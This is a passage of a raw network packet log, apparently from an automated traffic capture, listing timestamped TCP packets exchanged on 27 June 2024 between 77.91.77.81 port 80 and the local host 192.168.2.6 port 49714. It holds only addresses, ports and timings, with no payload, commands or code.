                                                                Jun 27, 2024 05:58:17.939620018 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939631939 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939642906 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939646006 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.939654112 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939665079 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939672947 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.939676046 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939687967 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939692020 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.939702034 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939713001 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939717054 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.939723969 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939735889 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939738035 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.939745903 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939759016 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939769030 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.939770937 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.939800024 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.940347910 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940366030 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940376997 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940387964 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940397024 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.940398932 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940409899 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940421104 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940423965 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.940432072 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940443039 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940450907 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.940453053 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940465927 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940476894 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940476894 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.940493107 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.940496922 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940510035 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940520048 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940521955 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.940531015 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940542936 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940547943 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.940553904 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940562010 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.940565109 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.940586090 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.940604925 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.941236019 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.941247940 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.941258907 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.941271067 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.941282034 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.941294909 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.941298008 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.941304922 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.941315889 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.941323042 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.941343069 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.941359043 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.944578886 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.944591999 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.944605112 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.944617987 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.944654942 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.944668055 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.944679976 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.944701910 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.944713116 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.944716930 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.944719076 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.944765091 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.974833012 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.974845886 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.974857092 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.974868059 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.974881887 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.974893093 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.974905014 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.974914074 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.974915028 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.974967003 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.975187063 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.975228071 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.975241899 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.975253105 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.975282907 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.975339890 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.975351095 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.975361109 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.975373030 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.975379944 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.975399971 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.975430965 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.975490093 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.975534916 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984038115 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984095097 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984107018 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984118938 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984143019 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984158993 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984230042 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984241009 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984255075 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984266996 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984267950 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984277010 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984282017 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984302044 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984338999 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984435081 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984446049 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984457970 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984472990 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984500885 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984582901 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984595060 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984606028 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984615088 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:17.984627962 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:17.984652042 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.025996923 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026011944 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026031017 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026041985 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026051998 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026055098 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026067019 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026078939 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026092052 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026098013 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026118040 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026132107 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026282072 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026293039 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026304007 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026315928 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026324034 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026328087 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026349068 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026374102 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026563883 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026575089 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026586056 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026597023 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026602030 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026608944 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026617050 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026618958 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026632071 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026639938 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026643038 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026654959 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026659966 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026664972 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026681900 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.026681900 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026721001 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.026745081 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.027272940 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027283907 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027295113 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027303934 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027313948 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027323961 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.027326107 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027337074 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027347088 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027349949 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.027359009 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027364016 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.027369976 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027380943 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027391911 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027395010 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.027404070 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027420044 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.027422905 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027431011 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.027434111 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027445078 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027455091 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027458906 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.027466059 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027476072 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027488947 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.027489901 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.027513981 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.027523041 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.028214931 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028227091 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028244972 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028255939 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028265953 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028274059 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.028276920 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028287888 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028295040 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.028300047 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028310061 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028321028 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028331041 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028341055 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028347015 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.028351068 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028362989 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028364897 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.028373003 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028381109 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.028383970 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028397083 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028405905 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.028407097 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028419018 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.028431892 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.028443098 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.028470993 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.029136896 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029149055 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029159069 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029170036 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029181957 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029194117 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029196024 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.029205084 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029217005 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029223919 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.029227018 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029237986 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029242992 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.029249907 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029253006 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.029259920 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029270887 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029283047 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.029284954 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.029310942 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.029320955 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.031858921 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.031903028 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.031905890 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.031917095 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.031944036 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.031956911 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.032037020 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.032052040 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.032063961 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.032075882 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.032078028 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.032095909 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.032120943 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.061696053 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.061711073 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.061722994 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.061783075 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.061809063 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.061815023 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.061825991 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.061836958 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.061847925 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.061856985 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.061887980 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.062144995 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.062189102 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.062211037 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.062222004 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.062258959 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.062335014 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.062346935 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.062355995 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.062366962 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.062377930 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.062377930 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.062405109 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.062429905 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071034908 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071088076 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071093082 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071105003 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071130037 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071141958 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071229935 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071242094 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071252108 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071264029 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071275949 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071279049 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071305037 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071330070 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071419954 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071436882 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071463108 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071474075 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071491003 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071502924 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071533918 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071650982 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071661949 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071671963 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.071701050 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.071712017 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.111809015 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.111851931 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.111865044 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.111890078 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.111907959 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.111938000 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.111948967 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.111962080 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.111974001 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.111975908 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.111983061 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112008095 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.112032890 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.112123966 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112133026 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112143993 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112157106 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112168074 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.112169981 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112198114 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.112209082 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.112323046 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112334013 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112370014 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.112447023 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112458944 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112471104 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112488985 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112499952 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112507105 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.112507105 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.112533092 CEST4971480192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:58:18.112700939 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112711906 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112723112 CEST804971477.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:58:18.112735033 CEST804971477.91.77.81192.168.2.6
